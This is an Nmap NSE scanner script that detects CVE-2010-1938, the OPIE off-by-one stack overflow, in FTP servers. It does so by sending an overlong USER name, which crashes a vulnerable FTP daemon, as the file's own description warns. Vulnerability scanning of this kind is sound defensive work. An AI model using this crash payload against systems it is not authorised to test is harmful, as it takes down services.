nmap/scripts/ftp-libopie.nse

description = [[
Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow),
a vulnerability discovered by Maksymilian Arciemowicz and Adam "pi3" Zabrocki.
See the advisory at http://nmap.org/r/fbsd-sa-opie.
Be advised that, if launched against a vulnerable host, this script will crash the FTPd.
]]

---
-- @output
-- PORT   STATE SERVICE
-- 21/tcp open  ftp
-- | ftp-libopie: Warning: Looks like the service has crashed!
-- | Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)
-- |_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc


author = "Ange Gutek"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln","intrusive"}

require "shortport"

portrule = shortport.port_or_service(21, "ftp")

action = function(host, port)
	local socket = nmap.new_socket()
	local result
	-- If we use more that 31 chars for username, ftpd will crash (quoted from the advisory).
	local user_account = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	local status = true

	local err_catch = function()
		socket:close()
	end

	local try = nmap.new_try(err_catch)

	socket:set_timeout(10000)
	try(socket:connect(host, port))

	-- First, try a safe User so that we are sure that everything is ok
	local payload = "USER opie\r\n"
	try(socket:send(payload))

	status, result = socket:receive_lines(1);
	if status and not (string.match(result,"^421")) then

		  -- Second, try the vulnerable user account
		  local payload = "USER " .. user_account .. "\r\n"
		  try(socket:send(payload))

		  status, result = socket:receive_lines(1);
		  if status then
			    return
		  else
		  -- if the server does not answer anymore we may have reached a stack overflow condition
		  return "Warning: Looks like the service has crashed!\nLikely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)\nSee http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc"
		  end
	else
		return
	end
end